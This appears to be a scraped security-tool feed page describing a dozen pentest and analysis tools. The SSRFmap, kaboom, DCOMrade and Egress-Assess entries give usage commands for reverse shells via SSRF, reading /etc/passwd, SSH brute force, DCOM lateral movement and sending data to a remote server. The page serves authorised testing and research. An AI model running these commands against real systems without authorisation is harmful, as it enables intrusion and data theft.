Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

Justniffer - Network TCP Packet Sniffer

$
0
0

Justniffer is a network protocol analyzer that captures network traffic and produces logs in a customized way, can emulate Apache web server log files, track response times and extract all "intercepted" files from the HTTP traffic.
It lets you interactively trace tcp traffic from a live network or from a previously saved capture file. Justniffer's native capture file format is libpcap format, which is also the format used by tcpdump and various other tools.

Reliable TCP Flow Rebuilding

The main Justniffer's feature is the ability to handle all those complex low level protocol issues and retrieve the correct flow of the TCP/IP traffic: IP fragmentation, TCP retransmission, reordering. etc. It uses portions of Linux kernel source code for handling all TCP/IP stuff. Precisely, it uses a slightly modified version of the libnids libraries that already include a modified version of Linux code in a more reusable way.

Optimized for "Request / Response" protocols. It is able to track server response time

Justniffer was born as tool for helping in analyzing performance problem in complex network environment when it becomes impractical to analyze network captures solely using low level packet sniffers (wireshark , tcpdump, etc.) . It will help you to quickly identify the most significant bottlenecks analyzing the performance at "application" protocol level.
In very complex and distributed systems is often useful to understand how communication takes place between different components, and when this is implemented as a network protocol based on TCP/IP (HTTP, JDBC, RTSP, SIP, SMTP, IMAP, POP, LDAP, REST, XML-RPC, IIOP, SOAP, etc.), justniffer comes in handy. Often the logging level and monitoring systems of these systems does not report important information to determine performance issues such as the response time of each network request. Because they are in a "production" environment and cannot be too much verbose or they are in-house developed applications and do not provide such logging.
Other times it is desirable to collect access logs from web services implemented on different environments (various web servers, application servers, python web frameworks, etc.) or web services that are not accessible and therefore traceable only on client side.
Justniffer can capture traffic in promiscuous mode so it can be installed on dedicated and independent station within the same network "collision domain" of the gateway of the systems that must be analyzed, collecting all traffic without affecting the system performances and requiring invasive installation of new software in production environments.

Can rebuild and save HTTP content on files

The robust implementation for the reconstruction of the TCP flow turns it in a multipurpose sniffer.
  • HTTP sniffer
  • LDAP sniffer
  • SMTP sniffer
  • SIP sniffer
  • password sniffer
justniffer can also be used to retrieve files sent over the network.

It is extensible

Can be extended by external scripts. A python script has been developed to recover all files sent via HTTP (images, text, html, javascript, etc.).

Features Summary
  • Reliable TCP flow rebuilding: it can reorder, reassemble tcp segments and ip fragments using portions of the Linux kernel code
  • Logging text mode can be customized
  • Extensibility by any executable, such as bash, python, perl scripts, ELF executable, etc.
  • Performance measurement it can collect many information on performances: connection time, close time, request time , response time, close time, etc.


CDF - Crypto Differential Fuzzing

$
0
0

CDF is a tool to automatically test the correctness and security of cryptographic software. CDF can detect implementation errors, compliance failures, side-channel leaks, and so on.
CDF implements a combination of unit tests with "differential fuzzing", an approach that compares the behavior of different implementations of the same primitives when fed edge cases and values maximizing the code coverage.
Unlike general-purpose fuzzers and testing software, CDF is:
  • Smart: CDF knows what kind of algorithm it's testing and adapts to the tested functions
  • Fast: CDF tests only what needs to be tested and parallelizes its tests as much as possible
  • Polyvalent: CDF isn't specific to any language or API, but supports arbitrary executable programs or scripts
  • Portable: CDF will run on any Unix or Windows platform, since it is written in Go without any platform-specific dependency
The purpose of CDF is to provide more efficient testing tool to developers and security researchers, being more effective than test vectors and cheaper than manual audit of formal verification.
CDF was first presented at Black Hat USA 2017. You can view the slides of our presentation, which contain general information about the rationale behind and the design of CDF.

Requirements
CDF is coded in Go, the current version has been developed using Go 1.8. It has no dependencies outside of Go's standard library.
However, we provide example programs to be tested using CDF, which are in C, Python, C++, Java and Go and require specific crypto libraries to be run. Currently required libraries are:

Build
make will build the cdf binary.
A bunch of example programs are available under example: make examples-all will build all the examples, while make examples-go will only build the Go examples.
make test will run unit tests (of CDF).

Usage
For starters you may want to view usage info by running cdf -h.
You may then try an example such as the rsaenc interface against the RSA OAEP Go and CryptoPP examples. Viewing CryptoPP as our reference, you can test the Go implementation by doing:
cdf rsaenc /examples/oaep_rsa2048_go /examples/oaep_rsa2048_cryptopp
This command will perform various tests specific to the rsaenc interface.
In this example, CDF should complain about the maximum public exponent size the Go implementation support: if we check its code we can see the public exponent is being stored as a normal integer, whereas in CryptoPP (and most other implementations), it is stored as a big integer. This is however by design and will likely not be changed.
Parameters are defined in config.json. Most parameters are self-explanatory. You may want to set others private keys for rsaenc and ecdsa (these interfaces are tested with fixed keys, although some key parameters, such as the exponents, are changed in some of the tests).
The seed parameter lets you change the seed used in CDF's pseudo-random generators. (Yet, the tested program may be using some PRNG seeded otherwise, like the OAEP examples.) The concurrency parameter lets you set the number of concurrent goroutine CDF should be spawning when forking the programs. Note that it is best to keep this number below the real number of cores. The verboseLog parameter, if set to true, will write all programs' inputs and outputs, even for the succesful tests, to a file log.txt.

Interfaces
In order to test your software using CDF, you have to create a program that reads input and writes output in conformance with CDF interfaces, and that internally calls the tested program. CDF interfaces are abstractions of a crypto functionality, in order to allow black-box testing of arbitrary implementations.
For example, if you implemented the ECDSA signature scheme, your program should satisfies the ecdsa interface and as such take as inputs 4 or 5 arguments, respectively in order to sign a message or verify a signature. These arguments are the public X coordinate, the public Y coordinate, the private D big integer and the message you want to sign and then it should output only the big integers R and S each on a newline. Or, to verify a message, it should accept X,Y, the R, the S and the message and then it should only output True or False. The interfaces' specifications are detailled below.
Our examples of interface implementations will help you create your owns.
Error handling is left to the tested program, however to have meaningful errors in CDF it is best to exit on failure, return a error code and print an error message.
The interface program can be written in any language, it just needs to be an executable file conformant with a CDF interface. An interface program is typically written in the same language as the tested program, but that's not mandatory (it may be a wrapper in another language, for example for Java programs).
CDF currently supports the following interfaces, wherein parameters are encoded as hexadecimal ASCII strings, unless described otherwise:

dsa
The dsa interface tests implementations of the Digital Signature Algorithm (DSA). It must support the signature and verification operations:
OperationInputOutput
Signaturep q g y x mr s
Verificationp q g y r s mtruth value
Here p, q, g are DSA parameters, y is a public key, x is a private key, m is a message, r and s form the signature, which must returned separated by a newline. The truth value, either “true” or “false”, is represented as a string.
The dsa interface supports an optional test: the-h allows to bypass the hashing process and directly provide the hash value to be signed. This allows CDF to perform more tests, such as checking for overflows or hash truncation.

ecdsa
The ecdsa interface tests implementations of the Elliptic Curve Digital Signature Algorithm (ECDSA). It must support the signature and verification operations:
OperationInputOutput
Signaturex y d mr s
Verificationx y r s mtruth value
Here x and y are a public ECDSA key coordinates, d is a private key, m is a message, and r and s form the signature, which must be returned separated by a newline. The truth value, either “true” or “false”, is represented by a string.
The flag -h serves the same purpose as with dsa.
Please note that our current design assumes a fixed curve, defined in the tested program.
To obtain reproducible results with those tests and leverage all of CDF detection's abilities, you have to either seed you random generator with a fixed seed or use a deterministic ECDSA variant, otherwise CDF can't detect problems such as same tags issues automatically.

enc
The enc interface tests symmetric encryption and decryption operations, typically when performed with a block cipher (stream ciphers can be tested with the prf interface). It must support encryption and decryption:
OperationInputOutput
Encryptionk mc
Decryptionk cr
Here k is a key, m is a message, c is a ciphertext c and r is a recovered plaintext.

prf
The prf interface tests keyed hashing (pseudorandom functions, MACs), as well as stream ciphers:
OperationInputOutput
Computationk mh
Here k is a key, m is a message (or nonce in case of a stream cipher), and h is the result of the PRF computation. Our interface assumes fixed key size and variable input lengths. If a specific key is to be specified, it is the responsibility of the tested program to ignore the key input or the xof interface may be a better choice.

rsaenc
The rsaenc tests RSA encryption and decryption, both OAEP (PKCS 2.1) and PKCS 1.5:
OperationInputOutput
Encryptionn e mc
Decryptionp q e d cr
Here n is a modulus, e is a public exponent (for compatibility with certain libraries, e is also needed for decryption), m is a message m, p and q are n's factor (such that p > q, since libraries commonly require it), d is a private exponent, and r is a recovered plaintext.

xof
The xof interface tests hash functions, extendable-output functions (XOFs), deterministic random bit generators (DRBGs):
OperationInputOutput
Computationmh
Here m is the message and h is the result h.

Authors
CDF is based on initial ideas by JP Aumasson, first disclosed at WarCon 2016, and most of the code was written by Yolan Romailler.



Up (Ultimate Plumber) - Tool For Writing Linux Pipes With Instant Live Preview

$
0
0

up is the Ultimate Plumber, a tool for writing Linux pipes in a terminal-based UI interactively, with instant live preview of command results.
The main goal of the Ultimate Plumber is to help interactively and incrementally explore textual data in Linux, by making it easier to quickly build complex pipelines, thanks to a fast feedback loop. This is achieved by boosting any typical Linux text-processing utils such as grep, sort, cut, paste, awk, wc, perl, etc., etc., by providing a quick, interactive, scrollable preview of their results.

Usage
Download up for Linux  |   ArchLinux: aur/up  |   macOS: brew install up  |   Other OSes
To start using up, redirect any text-emitting command (or pipeline) into it — for example:
$ lshw |& ./up
then:
  • use PgUp/PgDn and Ctrl-[←]/Ctrl-[→] for basic browsing through the command output;
  • in the input box at the top of the screen, start writing any bash pipeline; then press Enter to execute the command you typed, and the Ultimate Plumber will immediately show you the output of the pipeline in the scrollable window below (replacing any earlier contents)
    • For example, you can try writing: grep network -A2 | grep : | cut -d: -f2- | paste - -— on my computer, after pressing Enter, the screen then shows the pipeline and a scrollable preview of its output like below:
         | grep network -A2 | grep : | cut -d: -f2- | paste - -
      Wireless interface Centrino Advanced-N 6235
      Ethernet interface RTL8111/8168/8411 PCI Express Gigabit Ethernet Controller
    • WARNING: Please be careful when using it! It could be dangerous. In particular, writing "rm" or "dd" into it could be like running around with a chainsaw. But you'd be careful writing "rm" anywhere in Linux anyway, no?
  • when you are satisfied with the result, you can press Ctrl-X to exit the Ultimate Plumber, and the command you built will be written into up1.sh file in the current working directory (or, if it already existed, up2.sh, etc., until 1000, based on Shlemiel the Painter's algorithm). Alternatively, you can press Ctrl-C to quit without saving.
  • If the command you piped into up is long-running (in such case you will see a tilde ~ indicator character in the top-left corner of the screen, meaning that up is still waiting for more input), you may need to press Ctrl-S to temporarily freeze up's input buffer (a freeze will be indicated by a # character in top-left corner), which will inject a fake EOF into the pipeline; otherwise, some commands in the pipeline may not print anything, waiting for full input (especially commands like wc or sort, but grep, perl, etc. may also show incomplete results). To unfreeze back, press Ctrl-Q.

Additional Notes
  • The pipeline is passed verbatim to a bash -c command, so any bash-isms should work.
  • The input buffer of the Ultimate Plumber is currently fixed at 40 MB. If you reach this limit, a + character should get displayed in the top-left corner of the screen. (This is intended to be changed to a dynamically/manually growable buffer in a future version of up.)
  • MacOSX support: I don't have a Mac, thus I have no idea if it works on one. You are welcome to try, and also to send PRs. If you're interested in me providing some kind of official-like support for MacOSX, please consider trying to find a way to send me some usable-enough Mac computer. Please note I'm not trying to "take advantage" of you by this, as I'm actually not at all interested in achieving a Mac otherwise. (Also, trying to commit to this kind of support will be an extra burden and obligation on me. Knowing someone out there cares enough to do a fancy physical gesture would really help alleviate this.) If you're serious enough to consider this option, please contact me by email (mailto:czapkofan@gmail.com) or keybase (https://keybase.io/akavel), so that we could try to research possible ways to achieve this. Thanks for understanding!
  • Prior art: I was surprised no one seemed to write a similar tool before, that I could find. It should have been possible to write this since the dawn of Unix already, or earlier! And indeed, after I announced up, I got enough publicity that my attention was directed to one such earlier project already: Pipecut. Looks interesting! You may like to check it too! (Thanks @TronDD.)
  • Other influences: I don't remember the fact too well already, but I'm rather sure that this must have been inspired in big part by The Bret Victor's Talk(s).


Lazygit - Simple Terminal UI For Git Commands

$
0
0

A simple terminal UI for git commands, written in Go with the gocui library.
Are YOU tired of typing every git command directly into the terminal, but you're too stubborn to use Sourcetree because you'll never forgive Atlassian for making Jira? This is the app for you!

Installation

Homebrew
brew tap jesseduffield/lazygit
brew install lazygit

Ubuntu
Packages for Ubuntu 16.04, 18.04 and 18.10 are available via Launchpad PPA.
Release builds
Built from git tags. Supposed to be more stable.
sudo add-apt-repository ppa:lazygit-team/release
sudo apt-get update
sudo apt-get install lazygit
Daily builds
Built from master branch once in 24 hours (or more sometimes).
sudo add-apt-repository ppa:lazygit-team/daily
sudo apt-get update
sudo apt-get install lazygit

Void Linux
Packages for Void Linux are available in the distro repo
They follow upstream latest releases
sudo xbps-install -S lazygit

Arch Linux
Packages for Arch Linux are available via AUR (Arch User Repository).
There are two packages. The stable one which is built with the latest release and the git version which builds from the most recent commit.
Instruction of how to install AUR content can be found here: https://wiki.archlinux.org/index.php/Arch_User_Repository

Binary Release (Windows/Linux/OSX)
You can download a binary release here.

Go
go get github.com/jesseduffield/lazygit
Please note: If you get an error claiming that lazygit cannot be found or is not defined, you may need to add ~/go/bin to your $PATH (MacOS/Linux), or %HOME%\go\bin (Windows). Not to be mistaked for C:\Go\bin (which is for Go's own binaries, not apps like Lazygit).

Usage
Call lazygit in your terminal inside a git repository. If you want, you can also add an alias for this with echo "alias lg='lazygit'" >> ~/.zshrc (or whichever rc file you're using).
  • Basic video tutorial here.
  • List of keybindings here.

Cool features
  • Adding files easily
  • Resolving merge conflicts
  • Easily check out recent branches
  • Scroll through logs/diffs of branches/commits/stash
  • Quick pushing/pulling
  • Squash down and rename commits

Resolving merge conflicts


Viewing commit diffs


Milestones
  • Easy Installation (homebrew, release binaries)
  • Configurable Keybindings
  • Configurable Color Themes
  • Spawning Subprocesses
  • Maintainability
  • Performance
  • i18n

Pompem - Exploit and Vulnerability Finder

$
0
0

Pompem is an open source tool, designed to automate the search for Exploits and Vulnerability in the most important databases. Developed in Python, has a system of advanced search, that help the work of pentesters and ethical hackers. In the current version, it performs searches in PacketStorm security, CXSecurity, ZeroDay, Vulners, National Vulnerability Database, WPScan Vulnerability Database ...

Screenshots




Source code
You can download the latest tarball by clicking here or latest zipball by clicking here.
You can also download Pompem directly from its Git repository:
$ git clone https://github.com/rfunix/Pompem.git

Dependencies
Pompem works out of the box with Python 3.5 on any platform and requires the following packages:

Installation
Get Pompem up and running in a single command:
$ pip3.5 install -r requirements.txt
You may greatly benefit from using virtualenv, which isolates packages installed for every project. If you have never used it, simply check [this tutorial] (http://docs.python-guide.org/en/latest/dev/virtualenvs) .

Usage
To get the list of basic options and information about the project:
$ python3.5 pompem.py -h

Options:
-h, --help show this help message and exit
-s, --search <keyword,keyword,keyword> text for search
--txt Write txt File
--html Write html File
Examples of use:
$ python3.5 pompem.py -s Wordpress
$ python3.5 pompem.py -s Joomla --html
$ python3.5 pompem.py -s "Internet Explorer,joomla,wordpress" --html
$ python3.5 pompem.py -s FortiGate --txt
$ python3.5 pompem.py -s ssh,ftp,mysql



SSRFmap - Automatic SSRF Fuzzer And Exploitation Tool

$
0
0

SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Guide / RTFM
Basic install from the Github repository.
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py

usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]

optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--level [LEVEL] Level of test to perform (1-5, default: 1)
The default way to use this script is the following.
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
# --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> ...
A quick way to test the framework can be done with data/example.py SSRF service.
FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules
The following modules are already implemented and can be used with the -m argument.
NameDescription
fastcgiFastCGI RCE
redisRedis RCE
githubGithub Enterprise RCE < 2.8.7
zaddixZaddix RCE
mysqlMySQL Command execution
dockerDocker Infoleaks via API
smtpSMTP send mail
portscanScan ports for the host
networkscanHTTP Ping sweep over the network
readfilesRead files such as /etc/passwd
alibabaRead files from the provider (e.g: meta-data, user-data)
awsRead files from the provider (e.g: meta-data, user-data)
digitaloceanRead files from the provider (e.g: meta-data, user-data)
socksproxySOCKS4 Proxy
smbhashForce an SMB authentication via a UNC Path

Inspired by


Kaboom - Automatic Pentest

$
0
0

kaboom is a script that automates the penetration test. It performs several tasks for each phase of pentest:
  1. Information gathering [nmap-unicornscan]
    • TCP scan
    • UDP scan
  2. Vulnerability assessment [nmap-nikto-dirb-searchsploit-msfconsole]
    It tests several services:
    • smb
    • ssh
    • snmp
    • smtp
    • ftp
    • tftp
    • ms-sql
    • mysql
    • rdp
    • http
    • https
    • and more...
    It finds the CVEs and then searchs them on exploit-db or Metasploit db.
  3. Exploitation [hydra]
    • brute force ssh

Usage
kaboom supports two mode:
  • Interactive mode:
    kaboom [ENTER] ...and the script does the rest
  • NON-interactive mode:
    kaboom <results_path> <nic> <target_ip> [-s or --shutdown]
If you use the shutdown option, kaboom will shutdown the machine at the end of tasks.
If you want see this help:
kaboom -h (or --help)

Directory Hierarchy
kaboom saves the results of commands in this way:



Ponce - IDA Plugin For Symbolic Execution Just One-Click Away!

$
0
0

Ponce (pronounced [ 'poN θe ] pon-they ) is an IDA Pro plugin that provides users the ability to perform taint analysis and symbolic execution over binaries in an easy and intuitive fashion. With Ponce you are one click away from getting all the power from cutting edge symbolic execution. Entirely written in C/C++.

Why?
Symbolic execution is not a new concept in the security community. It has been around for years but it is not until the last couple of years that open source projects like Triton and Angr have been created to address this need. Despite the availability of these projects, end users are often left to implement specific use cases themselves.
We addressed these needs by creating Ponce, an IDA plugin that implements symbolic execution and taint analysis within the most used disassembler/debugger for reverse engineers.

Installation
Ponce works with both x86 and x64 binaries in IDA 6.8 and IDA 6.9x. Installing the plugin is as simple as copying the appropiate files from the latest builds to the plugins\ folder in your IDA installation directory.

IDA 7.0.
Ponce has initial support of IDA 7.0 for both x86 and x64 binaries in Windows. The plugin named Ponce64.dll should be copied from the latest_builds to the plugins\ folder in your IDA installation directory. Starting from version 7.0, IDA64 should be used to work with both x86 and x64 binaries.
Don't forget to register Ponce in plugins.cfg located in the same folder by adding the following line:
Ponce                            Ponce         Ctrl+Shift+Z 0  WIN

OS Support
Ponce works on Windows, Linux and OSX natively!

Use cases
  • Exploit development: Ponce can help you create an exploit in a far more efficient manner as the exploit developer may easily see what parts of memory and which registers you control, as well as possible addresses which can be leveraged as ROP gadgets.
  • Malware Analysis: Another use of Ponce is related to malware code. Analyzing the commands a particular family of malware supports is easily determined by symbolizing a simple known command and negating all the conditions where the command is being checked.
  • Protocol Reversing: One of the most interesting Ponce uses is the possibility of recognizing required magic numbers, headers or even entire protocols for controlled user input. For instance, Ponce can help you to list all the accepted arguments for a given command line binary or extract the file format required for a specific file parser.
  • CTF: Ponce speeds up the process of reverse engineer binaries during CTFs. As Ponce is totally integrated into IDA you don't need to worry about setup timing. It's ready to be used!
The plugin will automatically run, guiding you through the initial configuration the first time it is run. The configuration will be saved to a configuration file so you won't have to worry about the config window again.

Use modes
  • Tainting engine: This engine is used to determine at every step of the binary's execution which parts of memory and registers are controllable by the user input.
  • Symbolic engine: This engine maintains a symbolic state of registers and part of memory at each step in a binary's execution path.

Examples

Use symbolic execution to solve a crackMe
Here we can see the use of the symbolic engine and how we can solve constrains:
  • Passing simple aaaaa as argument.
  • We first select the symbolic engine.
  • We convert to symbolic the memory pointed by argv[1] (aaaaa)
  • Identify the symbolic condition that make us win and solve it.
  • Test the solution.

The crackme source code can be found here

Negate and inject a condition
In the next gif we can see the use of automatic tainting and how we can negate a condition and inject it in memory while debugging:
  • We select the symbolic engine and set the option to symbolize argv.
  • We identify the condition that needs to be satisfied to win the crackMe.
  • We negate an inject the solution everytime a byte of our input is checked against the key.
  • Finally we get the key elite that has been injected in memory and therefore reach the Win code.


The crackme source code can be found here

Using the tainting engine to track user controlled input
In this example we can see the use of the tainting engine with cmake. We are:
  • Passing a file as argument to cmake to have him parsing it.
  • We select we want to use the tainting engine
  • We taint the buffer that ```fread()```` reads from the file.
  • We resume the execution under the debugger control to see where the taint input is moved to.
  • Ponce will rename the tainted functions. These are the functions that somehow the user has influence on, not the simply executed functions.

Use Negate, Inject & Restore
In the next example we are using the snapshot engine:
  • Passing a file as argument.
  • We select we want to use the symbolic engine.
  • We taint the buffer that ```fread()```` reads from the file.
  • We create a snapshot in the function that parses the buffer read from the file.
  • When a condition is evaluated we negate it, inject the solution in memory and restore the snapshot with it.
  • The solution will be "valid" so we will satisfy the existent conditions.

The example source code can be found here

Usage
In this section we will list the different Ponce options as well as keyboard shortcuts:
  • Access the configuration and taint/symbolic windows: Edit > Ponce > Show Config (Ctl+Shift+P and Ctl+Alt+T)
  • Enable/Disable Ponce tracing (Ctl+Shift+E)
  • Symbolize/taint a register (Ctl+Shift+R)
  • Symbolize/taint memory. Can be done from the IDA View or the Hex View (Ctl+Shift+M)


  • Solve formula (Ctl+Shift+S)
  • Negate & Inject (Ctl+Shift+N)
  • Negate, Inject & Restore Snaphot (Ctl+Shift+I)
  • Create Execution Snapshot (Ctl+Shift+C)
  • Restore Execution Snapshot (Ctl+Shift+S)
  • Delete Execution Snapshot (Ctl+Shift+D)
  • Execute Native (Ctl+Shift+F9)

##Triton Ponce relies on the Triton framework to provide semantics, taint analysis and symbolic execution. Triton is an awesome Open Source project sponsored by Quarkslab and maintained mainly by Jonathan Salwan with a rich library. We would like to thank and endorse Jonathan's work with Triton. You rock! :)

Building
We provide compiled binaries for Ponce, but if you want to build your own plugin you can do so using Visual Studio 2013. We tried to make the building process as easy as possible:
  • Clone the project with submodules: git clone --recursive https://github.com/illera88/PonceProject.git
  • Open Build\PonceBuild\Ponce.sln: The project configuration is ready to use the includes and libraries shipped with the project that reside in external-libs\.
  • The VS project has a Post-Build Event that will move the created binary plugin to the IDA plugin folder for you. copy /Y $(TargetPath) "C:\Program Files (x86)\IDA 6.9\plugins". NOTE: use your IDA installation path.
The project has 4 build configurations:
  • x86ReleaseStatic: will create the 32 bits version statically linking every third party library into a whole large plugin file.
  • x86ReleaseZ3dyn: will create the 32 bits version statically linking every third party library but z3.lib.
  • x64ReleaseStatic: will create the 64 bits version statically linking every third party library into a whole large plugin file.
  • x64ReleaseZ3dyn: will create the 64 bits version statically linking every third party library but z3.lib.
The static version of z3.lib is ~ 1.1Gb and the linking time is considerable. That's the main reason why we have a building version that uses z3 dynamically (as a dll). If you are using z3 dynamically don't forget to copy the libz3.dll file into the IDA's directory.
If you want to build Triton for linux or MacOsX check this file: https://github.com/illera88/Ponce/tree/master/builds/PonceBuild/nix/README.md

FAQ

Why the name of Ponce?
Juan Ponce de León (1474 – July 1521) was a Spanish explorer and conquistador. He discovered Florida in the United States. The IDA plugin will help you discover, explore and hopefully conquer the different paths in a binary.

Can Ponce be used to analyze Windows, OS X and Linux binaries?
Yes, you can natively use Ponce in IDA for Windows or remotely attach to a Linux or OS X box and use it. In the next Ponce version we will natively support Ponce for Linux and OS X IDA versions.

How many instructions per second can handle Ponce?
In our tests we reach to process 3000 instructions per second. We plan to use the PIN tracer IDA offers to increase the speed.

Something is not working!
Open an issue, we will solve it ASAP ;)

I love your project! Can I collaborate?
Sure! Please do pull requests and work in the opened issues. We will pay you in beers for help ;)

Limitations
Concolic execution and Ponce have some problems:
  • Symbolic memory load/write: When the index used to read a memory value is symbolic like in x = aray[symbolic_index] some problems arise that could lead on the loose of track of the tainted/symbolized user controled input.
  • Triton doesn't work very well with floating point instructions.

Authors



DCOMrade - Powershell Script For Enumerating Vulnerable DCOM Applications

$
0
0

DCOMrade is a Powershell script that is able to enumerate the possible vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is build to work with Powershell 2.0 but will work with all versions above as well. The script currently supports the following Windows operating systems (both x86 and x64):
  • Microsoft Windows 7
  • Microsoft Windows 10
  • Microsoft Windows Server 2012 / 2012 R2
  • Microsoft Windows Server 2016

How it works
The script was made based on the research done by Matt Nelson (@enigma0x3), especially the round 2 blogpost that goes into finding DCOM applications that might be useful for pentesters and red teams.
First a remote connection with the target system is made, this connection is used throughout the script for a multitude of operations. A Powershell command is executed on the target system that retrieves all the DCOM applications and their AppID's. The AppID's are used to loop through the Windows Registry and check for any AppID that does not have the LaunchPermission subkey set in their entry, these AppID's are stored and used to retrieve their associated CLSID's.
The script uses a specific blacklist with each OS, this is why there are different options for the target operating system. The blacklist skips CLSID entries that might hang the script because of DCOM applications that cannot be activated, this reduces the load on the target system and reduces the time for the script to complete.
With the CLSID, the DCOM application associated with it can be activated. The 'Shortcut' CLSID is used to count the amount of MemberTypes associated with it, this is done to check the default amount of MemberTypes. This number is used to check for the CLSID's that hold anything different than this amount. The script does this with the CLSID of the 'Shortcut' (HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}) because this is a shared CLSID across the Microsoft Windows operating systems. The CLSID's with a different amount of MemberTypes might hold a Method or Property that can be (ab)used, and will be added to an array.
The CLSID's in the array are being checked on strings in the MemberTypes that might indicate a way to (ab)use it, this list of strings can be found in the VulnerableSubset file. Please note that this list is by no means a complete list to find every single vulnerable DCOM application, but this list being a dynamic part of the process should give the user of the script a way to look for specific strings that migth indicate a functionality of a DCOM application that might be useful for their purpose.
The results of the script are outputted in a HTML report and should be usable for auditing a system as a preventive measure. For the offensive side I created an Empire module which at the time of writing is awaiting approval to be added to the master branch. If you would like to add this to Empire yourself you can do so by adding the module located here.
For a full technical explanation of the idea, the script and possible detection methods you can read the research paper associated with this.

Prerequisites
The script, while not being used as an Empire module, has some limitations as the working of the script and how it connects with the target machine differs.
  • For this script to work, the Windows Remote Management services need to be allowed in the Windows Firewall (5985);
  • If the target system's network profile is set to Public the following command needs to be executed to allow Windows Remote Management services being used on the target system: Enable-PSRemoting -SkipNetworkProfilecheck -Force
  • This script only works when one has the credentials of a local Administrator on the target system. Without these credentials you will not be able to start a remote session with the target machine, or be able to activate DCOM applications.

Example usage
When in a Microsoft Windows domain:
.\DCOMrade.ps1 -ComputerName [Computername / IP] -User [Local Administrator] -OS [Operating System] -Domain [Domain name]
When not in a Microsoft Windows domain:
.\DCOMrade.ps1 -ComputerName [Computername / IP] -User [Local Administrator] -OS [Operating System]

Limitations
  • Currently the script does try to release any instantiated / activated DCOM applications but some activations start new processes (such as Internet Explorer), the process could be stopped but this would mean that if a user on the target system is using that particular application, this process will stop for them as well;
  • Another thing, which probably has to do with bad my coding skills, is that the script might introduce considerable load on the target system if the target system does not have a lot of resources. Be considerate when using this in a production environment or on servers;
  • The script might take some time to execute completely, this depends on the amount of DCOM applications and the size of the vulnerable subset file.

Acknowledgements
This script was inspired by a DCOM lateral movement workshop that was given by Eva Tanaskoska, without this workshop the whole idea for trying to enumerate this in an automated manner would never be conceived.
Thanks to Matt Nelson's (a.k.a. @enigma0x3) research I was able to find enough information to come up with a form of automation.
Philip Tsukerman's article which sums up most of the available DCOM techniques for lateral movement and going into how these work.


TROMMEL - Sift Through Embedded Device Files To Identify Potential Vulnerable Indicators

$
0
0

TROMMEL sifts through embedded device files to identify potential vulnerable indicators.
TROMMEL identifies the following indicators related to:
  • Secure Shell (SSH) key files
  • Secure Socket Layer (SSL) key files
  • Internet Protocol (IP) addresses
  • Uniform Resource Locator (URL)
  • email addresses
  • shell scripts
  • web server binaries
  • configuration files
  • database files
  • specific binaries files (i.e. Dropbear, BusyBox, etc.)
  • shared object library files
  • web application scripting variables, and
  • Android application package (APK) file permissions.
TROMMEL has also integrated vFeed which allows for further in-depth vulnerability analysis of identified indicators.

Dependencies
  • Python-Magic - See documentation for instructions for Python3-magic installation
  • vFeed Database - For non-commercial use, register and download the Community Edition database

Usage
$ trommel.py --help
Output TROMMEL results to a file based on a given directory. By default, only searches plain text files.
$ trommel.py -p /directory -o output_file
Output TROMMEL results to a file based on a given directory. Search both binary and plain text files.
$ trommel.py -p /directory -o output_file -b

Notes
  • The intended use of TROMMEL is to assist researchers during firmware analysis.
  • TROMMEL has been tested using Python3 on Kali Linux x86_64.
  • TROMMEL was written with the intent to help with identifying indicators that may contain vulnerabilities found in firmware of embedded devices.

References

Author
  • Kyle O'Meara - komeara AT cert DOT org


Fibratus - Tool For Exploration And Tracing Of The Windows Kernel

$
0
0

Fibratus is a tool which is able to capture the most of the Windowskernel activity - process/thread creation and termination, context switches, file system I/O, registry, network activity, DLL loading/unloading and much more. The kernel events can be easily streamed to a number of output sinks like AMQP message brokers, Elasticsearch clusters or standard output stream. You can use filaments (lightweight Python modules) to extend Fibratus with your own arsenal of tools and so leverage the power of the Python's ecosystem.

Installation
Download the latest release (Windows installer). The changelog and older releases can be found here.
Alternatively, you can get fibratus from PyPI.
  1. Install the dependencies
  • Download and install Python 3.4.
  • Install Visual Studio 2015 (you'll only need the Visual C compiler to build the kstreamc extension). Make sure to export the VS100COMNTOOLS environment variable so it points to %VS140COMNTOOLS%.
  • Get Cython: pip install Cython >=0.23.4.
  1. Install fibratus via the pip package manager:
pip install fibratus

Documentation
See the wiki.


Egress-Assess - Tool Used To Test Egress Data Detection Capabilities

$
0
0

Egress-Assess is a tool used to test egress data detection capabilities.

Setup
To setup, run the included setup script, or perform the following:
  1. Install pyftpdlib
  2. Generate a server certificate and store it as "server.pem" on the same level as Egress-Assess. This can be done with the following command:
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes


Usage
Blog posts are available here:
Typical use case for Egress-Assess is to copy this tool in two locations. One location will act as the server, the other will act as the client. Egress-Assess can send data over FTP, HTTP, and HTTPS.
To extract data over FTP, you would first start Egress-Assess’s FTP server by selecting “--server ftp” and providing a username and password to use:
./Egress-Assess.py --server ftp --username testuser --password pass123

Now, to have the client connect and send data to the ftp server, you could run...
./Egress-Assess.py --client ftp --username testuser --password pass123 --ip 192.168.63.149 --datatype ssn

Also, you can setup Egress-Assess to act as a web server by running....
./Egress-Assess.py --server https

Then, to send data to the FTP server, and to specifically send 15 megs of credit card data, run the following command...
